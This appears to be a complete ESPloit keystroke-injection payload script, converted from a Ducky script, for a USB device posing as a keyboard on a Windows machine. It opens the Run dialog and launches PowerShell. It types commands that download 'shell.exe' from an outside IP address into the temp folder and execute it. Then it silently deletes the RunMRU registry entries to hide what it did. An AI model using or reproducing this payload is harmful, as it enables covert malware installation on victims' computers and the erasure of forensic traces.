Rem:Generated by Dckuino.js by NURRL
Rem:Modified for use with ESPloit by Corey Harding
Rem:-----
Press:131+114
CustomDelay:1000
Print:powershell.exe
Press:176
CustomDelay:100
Print:$url="http://172.19.4.80/shell.exe"; $outpath="$env:TEMP\shell.exe"; Invoke-WebRequest -Uri $url -OutFile $outpath
Press:176
Print:Start-Process -FilePath "$outpath"
Press:176
Print:exit
Press:176
Press:131+114
CustomDelay:1000
Print:powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
Press:176